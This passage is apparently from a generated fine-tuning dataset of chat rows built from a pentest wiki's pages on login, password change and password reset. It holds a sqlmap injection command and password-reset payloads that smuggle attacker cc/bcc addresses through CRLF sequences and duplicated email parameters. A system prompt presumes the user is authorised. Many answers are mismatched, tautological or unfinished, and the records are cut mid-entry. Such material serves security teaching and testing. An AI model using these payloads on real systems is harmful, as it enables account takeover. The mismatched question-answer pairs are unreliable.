performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Logging in - SQL injection"}, {"role": "assistant", "content": "sqlmap -r $REQUEST_FILE -p $LOGIN_PARAM,$PWD_PARAM"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Logging in - SQL injection", "response": "sqlmap -r $REQUEST_FILE -p $LOGIN_PARAM,$PWD_PARAM", "metadata": {"corpus_index": 1693, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `sqlmap -r $REQUEST_FILE -p $LOGIN_PARAM,$PWD_PARAM`?"}, {"role": "assistant", "content": "This command is used for 🛠️ logging in - sql injection. SQL injection"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `sqlmap -r $REQUEST_FILE -p $LOGIN_PARAM,$PWD_PARAM`?", "response": "This command is used for 🛠️ logging in - sql injection. SQL injection", "metadata": {"corpus_index": 1693, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 🛠️ Logging in - 🛠️ NoSQL injection"}, {"role": "assistant", "content": "For manual testing: NoSQL injection (PayloadsAllTheThings)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 🛠️ Logging in - 🛠️ NoSQL injection", "response": "For manual testing: NoSQL injection (PayloadsAllTheThings)", "metadata": {"corpus_index": 1694, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ Logging in - 🛠️ NoSQL injection"}, {"role": "assistant", "content": "For manual testing: NoSQL injection (PayloadsAllTheThings)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ Logging in - 🛠️ NoSQL injection", "response": "For manual testing: NoSQL injection (PayloadsAllTheThings)", "metadata": {"corpus_index": 1694, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ Logging in - 🛠️ LDAP injection?"}, {"role": "assistant", "content": "For manual testing: LDAP injection (PayloadsAllTheThings)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ Logging in - 🛠️ LDAP injection?", "response": "For manual testing: LDAP injection (PayloadsAllTheThings)", "metadata": {"corpus_index": 1695, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ Logging in - 🛠️ LDAP injection"}, {"role": "assistant", "content": "For manual testing: LDAP injection (PayloadsAllTheThings)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ Logging in - 🛠️ LDAP injection", "response": "For manual testing: LDAP injection (PayloadsAllTheThings)", "metadata": {"corpus_index": 1695, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ Logging in - Encrypted requests in the context of penetration testing"}, {"role": "assistant", "content": "Some web applications don't use TLS to encrypt login requests, this can lead to account takeover via a Man-in-the-Middle attack."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ Logging in - Encrypted requests in the context of penetration testing", "response": "Some web applications don't use TLS to encrypt login requests, this can lead to account takeover via a Man-in-the-Middle attack.", "metadata": {"corpus_index": 1696, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Logging in - Encrypted requests?"}, {"role": "assistant", "content": "Some web applications don't use TLS to encrypt login requests, this can lead to account takeover via a Man-in-the-Middle attack."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Logging in - Encrypted requests?", "response": "Some web applications don't use TLS to encrypt login requests, this can lead to account takeover via a Man-in-the-Middle attack.", "metadata": {"corpus_index": 1696, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Password change"}, {"role": "assistant", "content": "Websites that manage user accounts usually offer a \"password change\" feature. This offers attackers an interesting vector as it could potentially lead to Account Takeover (ATO).\n\nWhen this feature is present on a website, there a a few things to check.\n\n* Is the previous password required to set a new one? If it's not, this could potentially make CSRF attacks lead to Account Takeover (ATO).\n* Is the username/id/login/email sent somewhere in the password change request? If it is, can that parameter be changed to another usename/id/... to change another account's password?"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Password change", "response": "Websites that manage user accounts usually offer a \"password change\" feature. This offers attackers an interesting vector as it could potentially lead to Account Takeover (ATO).\n\nWhen this feature is present on a website, there a a few things to check.\n\n* Is the previous password required to set a new one? If it's not, this could potentially make CSRF attacks lead to Account Takeover (ATO).\n* Is the username/id/login/email sent somewhere in the password change request? If it is, can that parameter be changed to another usename/id/... to change another account's password?", "metadata": {"corpus_index": 1697, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-change.md", "page_title": "Password change", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Password change"}, {"role": "assistant", "content": "Websites that manage user accounts usually offer a \"password change\" feature. This offers attackers an interesting vector as it could potentially lead to Account Takeover (ATO).\n\nWhen this feature is present on a website, there a a few things to check.\n\n* Is the previous password required to set a new one? If it's not, this could potentially make CSRF attacks lead to Account Takeover (ATO).\n* Is the username/id/login/email sent somewhere in the password change request? If it is, can that parameter be changed to another usename/id/... to change another account's password?"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Password change", "response": "Websites that manage user accounts usually offer a \"password change\" feature. This offers attackers an interesting vector as it could potentially lead to Account Takeover (ATO).\n\nWhen this feature is present on a website, there a a few things to check.\n\n* Is the previous password required to set a new one? If it's not, this could potentially make CSRF attacks lead to Account Takeover (ATO).\n* Is the username/id/login/email sent somewhere in the password change request? If it is, can that parameter be changed to another usename/id/... to change another account's password?", "metadata": {"corpus_index": 1697, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-change.md", "page_title": "Password change", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ Password reset - Theory?"}, {"role": "assistant", "content": "Websites that manage user accounts usually have a \"forgot password\" or \"reset password\" feature. This offers attackers an interesting vector as it could potentially lead to Account Takeover (ATO)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ Password reset - Theory?", "response": "Websites that manage user accounts usually have a \"forgot password\" or \"reset password\" feature. This offers attackers an interesting vector as it could potentially lead to Account Takeover (ATO).", "metadata": {"corpus_index": 1698, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-reset.md", "page_title": "🛠️ Password reset", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Password reset - Theory during a pentest?"}, {"role": "assistant", "content": "Websites that manage user accounts usually have a \"forgot password\" or \"reset password\" feature. This offers attackers an interesting vector as it could potentially lead to Account Takeover (ATO)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Password reset - Theory during a pentest?", "response": "Websites that manage user accounts usually have a \"forgot password\" or \"reset password\" feature. This offers attackers an interesting vector as it could potentially lead to Account Takeover (ATO).", "metadata": {"corpus_index": 1698, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-reset.md", "page_title": "🛠️ Password reset", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Password reset - Practice"}, {"role": "assistant", "content": "When this feature is present on a website, there a a few things to check.\n\n* Is there a captcha, rate-limit or any other anti-DoS mitigation?\n* Is there any kind of validation, from the user, that the password must be reset? This could lead to a kind of DoS on user accounts if there isn't.\n* Is the feature relying on security questions that could be easily answered from OSINT or Social Engineering?\n* Is the previous password sent in clear-text to the user, indicating that the passwords are not stored in a hashed format?\n* If a one-time password (OTP) is sent to proceed with the password reset, is it sent on a secure channel (e.g. mitigating MitM)?\n* Can the feature be used by attackers to enumerate users (e.g. error message when trying to proceed with a user that doesn't exist)?\n* Is there a password reset link sent? If so:\n * Is it still valid after a reset?\n * Does it have an expiry date? If so, is it still valid after that period of time?\n * Is the link fully random or is there any guessable format that can be reproduced to takeover other accounts?\n* Is \"password reset\" link sent to an email indicated in a parameter that is not correctly filtered? --> Paramater manipulation\n\n///// WIP below"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Password reset - Practice", "response": "When this feature is present on a website, there a a few things to check.\n\n* Is there a captcha, rate-limit or any other anti-DoS mitigation?\n* Is there any kind of validation, from the user, that the password must be reset? This could lead to a kind of DoS on user accounts if there isn't.\n* Is the feature relying on security questions that could be easily answered from OSINT or Social Engineering?\n* Is the previous password sent in clear-text to the user, indicating that the passwords are not stored in a hashed format?\n* If a one-time password (OTP) is sent to proceed with the password reset, is it sent on a secure channel (e.g. mitigating MitM)?\n* Can the feature be used by attackers to enumerate users (e.g. error message when trying to proceed with a user that doesn't exist)?\n* Is there a password reset link sent? If so:\n * Is it still valid after a reset?\n * Does it have an expiry date? If so, is it still valid after that period of time?\n * Is the link fully random or is there any guessable format that can be reproduced to takeover other accounts?\n* Is \"password reset\" link sent to an email indicated in a parameter that is not correctly filtered? --> Paramater manipulation\n\n///// WIP below", "metadata": {"corpus_index": 1699, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-reset.md", "page_title": "🛠️ Password reset", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Password reset - Practice?"}, {"role": "assistant", "content": "When this feature is present on a website, there a a few things to check.\n\n* Is there a captcha, rate-limit or any other anti-DoS mitigation?\n* Is there any kind of validation, from the user, that the password must be reset? This could lead to a kind of DoS on user accounts if there isn't.\n* Is the feature relying on security questions that could be easily answered from OSINT or Social Engineering?\n* Is the previous password sent in clear-text to the user, indicating that the passwords are not stored in a hashed format?\n* If a one-time password (OTP) is sent to proceed with the password reset, is it sent on a secure channel (e.g. mitigating MitM)?\n* Can the feature be used by attackers to enumerate users (e.g. error message when trying to proceed with a user that doesn't exist)?\n* Is there a password reset link sent? If so:\n * Is it still valid after a reset?\n * Does it have an expiry date? If so, is it still valid after that period of time?\n * Is the link fully random or is there any guessable format that can be reproduced to takeover other accounts?\n* Is \"password reset\" link sent to an email indicated in a parameter that is not correctly filtered? --> Paramater manipulation\n\n///// WIP below"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Password reset - Practice?", "response": "When this feature is present on a website, there a a few things to check.\n\n* Is there a captcha, rate-limit or any other anti-DoS mitigation?\n* Is there any kind of validation, from the user, that the password must be reset? This could lead to a kind of DoS on user accounts if there isn't.\n* Is the feature relying on security questions that could be easily answered from OSINT or Social Engineering?\n* Is the previous password sent in clear-text to the user, indicating that the passwords are not stored in a hashed format?\n* If a one-time password (OTP) is sent to proceed with the password reset, is it sent on a secure channel (e.g. mitigating MitM)?\n* Can the feature be used by attackers to enumerate users (e.g. error message when trying to proceed with a user that doesn't exist)?\n* Is there a password reset link sent? If so:\n * Is it still valid after a reset?\n * Does it have an expiry date? If so, is it still valid after that period of time?\n * Is the link fully random or is there any guessable format that can be reproduced to takeover other accounts?\n* Is \"password reset\" link sent to an email indicated in a parameter that is not correctly filtered? --> Paramater manipulation\n\n///// WIP below", "metadata": {"corpus_index": 1699, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-reset.md", "page_title": "🛠️ Password reset", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ Password reset - Password Reset Poisoning in the context of penetration testing"}, {"role": "assistant", "content": "To provide the user with a link to reset its password, some implementations use the result of input headers such as the Host header. This helps in constructing a resetting password link by keeping the origin (example.com). By manually changing the Host header and using a malicious origin (malicious.com), the user is redirected to malicious.com when clicking the link.\n\nThis vulnerability is easy to test.\n\n1. Send a request to a forget password mechanism using your own email.\n2. Change the Host header between the requests\n3. Check the resetting password link you received via email. If the value of the Host header is reflected in the origin in the link (https://www.malicious.com/reset-link.php?token=$TOKEN_VALUE, then it's vulnerable"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ Password reset - Password Reset Poisoning in the context of penetration testing", "response": "To provide the user with a link to reset its password, some implementations use the result of input headers such as the Host header. This helps in constructing a resetting password link by keeping the origin (example.com). By manually changing the Host header and using a malicious origin (malicious.com), the user is redirected to malicious.com when clicking the link.\n\nThis vulnerability is easy to test.\n\n1. Send a request to a forget password mechanism using your own email.\n2. Change the Host header between the requests\n3. Check the resetting password link you received via email. If the value of the Host header is reflected in the origin in the link (https://www.malicious.com/reset-link.php?token=$TOKEN_VALUE, then it's vulnerable", "metadata": {"corpus_index": 1700, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-reset.md", "page_title": "🛠️ Password reset", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Password reset - Password Reset Poisoning?"}, {"role": "assistant", "content": "To provide the user with a link to reset its password, some implementations use the result of input headers such as the Host header. This helps in constructing a resetting password link by keeping the origin (example.com). By manually changing the Host header and using a malicious origin (malicious.com), the user is redirected to malicious.com when clicking the link.\n\nThis vulnerability is easy to test.\n\n1. Send a request to a forget password mechanism using your own email.\n2. Change the Host header between the requests\n3. Check the resetting password link you received via email. If the value of the Host header is reflected in the origin in the link (https://www.malicious.com/reset-link.php?token=$TOKEN_VALUE, then it's vulnerable"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Password reset - Password Reset Poisoning?", "response": "To provide the user with a link to reset its password, some implementations use the result of input headers such as the Host header. This helps in constructing a resetting password link by keeping the origin (example.com). By manually changing the Host header and using a malicious origin (malicious.com), the user is redirected to malicious.com when clicking the link.\n\nThis vulnerability is easy to test.\n\n1. Send a request to a forget password mechanism using your own email.\n2. Change the Host header between the requests\n3. Check the resetting password link you received via email. If the value of the Host header is reflected in the origin in the link (https://www.malicious.com/reset-link.php?token=$TOKEN_VALUE, then it's vulnerable", "metadata": {"corpus_index": 1700, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-reset.md", "page_title": "🛠️ Password reset", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 🛠️ Password reset - Token leak via Referer header"}, {"role": "assistant", "content": "The Referer header contains information about the previous web page from which a request has been made. It example1.com has a link pointing to example2.com, when clicking on that link, the Referer header will be set to example1.com. The Referer header will print out the whole URL, containing query parameters and so on, not just the origin.\n\n> [!TIP]\n> Using the Referrer-Policy with the directive no-referrer mitigates the issue.\n\nTo test for token leakage:\n\n1. The forgot password mechanism has to be used with a valid email address.\n2. After clicking on the reset password link (received by email), the password shouldn't be changed.\n3. Upon clicking on the reset password link, it's important to click on another link from another origin.\n4. By intercepting the request, one can check if the Referer header (if set), contains the token.\n\n> [!TIP]\n> In a real-world situation, the \"other\" origin should be vulnerable for an attacker to intercept the token (from the Referer header)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 🛠️ Password reset - Token leak via Referer header", "response": "The Referer header contains information about the previous web page from which a request has been made. It example1.com has a link pointing to example2.com, when clicking on that link, the Referer header will be set to example1.com. The Referer header will print out the whole URL, containing query parameters and so on, not just the origin.\n\n> [!TIP]\n> Using the Referrer-Policy with the directive no-referrer mitigates the issue.\n\nTo test for token leakage:\n\n1. The forgot password mechanism has to be used with a valid email address.\n2. After clicking on the reset password link (received by email), the password shouldn't be changed.\n3. Upon clicking on the reset password link, it's important to click on another link from another origin.\n4. By intercepting the request, one can check if the Referer header (if set), contains the token.\n\n> [!TIP]\n> In a real-world situation, the \"other\" origin should be vulnerable for an attacker to intercept the token (from the Referer header).", "metadata": {"corpus_index": 1701, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-reset.md", "page_title": "🛠️ Password reset", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ Password reset - Token leak via Referer header?"}, {"role": "assistant", "content": "The Referer header contains information about the previous web page from which a request has been made. It example1.com has a link pointing to example2.com, when clicking on that link, the Referer header will be set to example1.com. The Referer header will print out the whole URL, containing query parameters and so on, not just the origin.\n\n> [!TIP]\n> Using the Referrer-Policy with the directive no-referrer mitigates the issue.\n\nTo test for token leakage:\n\n1. The forgot password mechanism has to be used with a valid email address.\n2. After clicking on the reset password link (received by email), the password shouldn't be changed.\n3. Upon clicking on the reset password link, it's important to click on another link from another origin.\n4. By intercepting the request, one can check if the Referer header (if set), contains the token.\n\n> [!TIP]\n> In a real-world situation, the \"other\" origin should be vulnerable for an attacker to intercept the token (from the Referer header)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ Password reset - Token leak via Referer header?", "response": "The Referer header contains information about the previous web page from which a request has been made. It example1.com has a link pointing to example2.com, when clicking on that link, the Referer header will be set to example1.com. The Referer header will print out the whole URL, containing query parameters and so on, not just the origin.\n\n> [!TIP]\n> Using the Referrer-Policy with the directive no-referrer mitigates the issue.\n\nTo test for token leakage:\n\n1. The forgot password mechanism has to be used with a valid email address.\n2. After clicking on the reset password link (received by email), the password shouldn't be changed.\n3. Upon clicking on the reset password link, it's important to click on another link from another origin.\n4. By intercepting the request, one can check if the Referer header (if set), contains the token.\n\n> [!TIP]\n> In a real-world situation, the \"other\" origin should be vulnerable for an attacker to intercept the token (from the Referer header).", "metadata": {"corpus_index": 1701, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-reset.md", "page_title": "🛠️ Password reset", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Password reset - Paramater manipulation"}, {"role": "assistant", "content": "When clicking on a reset password button, a request can be sent with a parameter such as email=$EMAIL. By modifying this parameter, multiple tests can be done to take over the account requesting a reset password.\n\nBased on CyPH3R's blog post:\n\n``\nemail=victim@email.com&email=attacker@email.com\nemail=victim@email.com%20email=attacker@email.com\nemail=victim@email.com|email=attacker@email.com\nemail=\"victim@mail.tld%0a%0dcc:attacker@mail.tld\"\nemail=\"victim@mail.tld%0a%0dbcc:attacker@mail.tld\"\nemail=\"victim@mail.tld\",email=\"attacker@mail.tld\"\n{\"email\":[\"victim@mail.tld\",\"atracker@mail.tld\"]}\n`\n\nThe same can be done when the request uses an API:\n\n`\n(\"form\": {\"email\":\"victim@email.tld\",\"password\":\"12345678\"})\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Password reset - Paramater manipulation", "response": "When clicking on a reset password button, a request can be sent with a parameter such as email=$EMAIL. By modifying this parameter, multiple tests can be done to take over the account requesting a reset password.\n\nBased on CyPH3R's blog post:\n\n``\nemail=victim@email.com&email=attacker@email.com\nemail=victim@email.com%20email=attacker@email.com\nemail=victim@email.com|email=attacker@email.com\nemail=\"victim@mail.tld%0a%0dcc:attacker@mail.tld\"\nemail=\"victim@mail.tld%0a%0dbcc:attacker@mail.tld\"\nemail=\"victim@mail.tld\",email=\"attacker@mail.tld\"\n{\"email\":[\"victim@mail.tld\",\"atracker@mail.tld\"]}\n`\n\nThe same can be done when the request uses an API:\n\n`\n(\"form\": {\"email\":\"victim@email.tld\",\"password\":\"12345678\"})\n``", "metadata": {"corpus_index": 1702, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-reset.md", "page_title": "🛠️ Password reset", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ Password reset - Paramater manipulation?"}, {"role": "assistant", "content": "When clicking on a reset password button, a request can be sent with a parameter such as email=$EMAIL. By modifying this parameter, multiple tests can be done to take over the account requesting a reset password.\n\nBased on CyPH3R's blog post:\n\n``\nemail=victim@email.com&email=attacker@email.com\nemail=victim@email.com%20email=attacker@email.com\nemail=victim@email.com|email=attacker@email.com\nemail=\"victim@mail.tld%0a%0dcc:attacker@mail.tld\"\nemail=\"victim@mail.tld%0a%0dbcc:attacker@mail.tld\"\nemail=\"victim@mail.tld\",email=\"attacker@mail.tld\"\n{\"email\":[\"victim@mail.tld\",\"atracker@mail.tld\"]}\n`\n\nThe same can be done when the request uses an API:\n\n`\n(\"form\": {\"email\":\"victim@email.tld\",\"password\":\"12345678\"})\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ Password reset - Paramater manipulation?", "response": "When clicking on a reset password button, a request can be sent with a parameter such as email=$EMAIL. By modifying this parameter, multiple tests can be done to take over the account requesting a reset password.\n\nBased on CyPH3R's blog post:\n\n``\nemail=victim@email.com&email=attacker@email.com\nemail=victim@email.com%20email=attacker@email.com\nemail=victim@email.com|email=attacker@email.com\nemail=\"victim@mail.tld%0a%0dcc:attacker@mail.tld\"\nemail=\"victim@mail.tld%0a%0dbcc:attacker@mail.tld\"\nemail=\"victim@mail.tld\",email=\"attacker@mail.tld\"\n{\"email\":[\"victim@mail.tld\",\"atracker@mail.tld\"]}\n`\n\nThe same can be done when the request uses an API:\n\n`\n(\"form\": {\"email\":\"victim@email.tld\",\"password\":\"12345678\"})\n``", "metadata": {"corpus_index": 1702, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-reset.md", "page_title": "🛠️ Password reset", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Password reset - Paramater manipulation?"}, {"role": "assistant", "content": "email=victim@email.com&email=attacker@email.com\nemail=victim@email.com%20email=attacker@email.com\nemail=victim@email.com|email=attacker@email.com\nemail=\"victim@mail.tld%0a%0dcc:attacker@mail.tld\"\nemail=\"victim@mail.tld%0a%0dbcc:attacker@mail.tld\"\nemail=\"victim@mail.tld\",email=\"attacker@mail.tld\"\n{\"email\":[\"victim@mail.tld\",\"atracker@mail.tld\"]}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Password reset - Paramater manipulation?", "response": "email=victim@email.com&email=attacker@email.com\nemail=victim@email.com%20email=attacker@email.com\nemail=victim@email.com|email=attacker@email.com\nemail=\"victim@mail.tld%0a%0dcc:attacker@mail.tld\"\nemail=\"victim@mail.tld%0a%0dbcc:attacker@mail.tld\"\nemail=\"victim@mail.tld\",email=\"attacker@mail.tld\"\n{\"email\":[\"victim@mail.tld\",\"atracker@mail.tld\"]}", "metadata": {"corpus_index": 1703, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/password-reset.md", "page_title": "🛠️ Password reset", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `email=victim@email.com&email=attacker@email.com`?"}, {"role": "assistant", "content": "This command is used for 🛠️ password reset - paramater manipulation. Paramater manipulation"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `email=victim@email.com&email=attacker@email.com`?", "response": "This command is used for 🛠️ password reset - paramater manipulation. Paramater manipulation", "metadata": 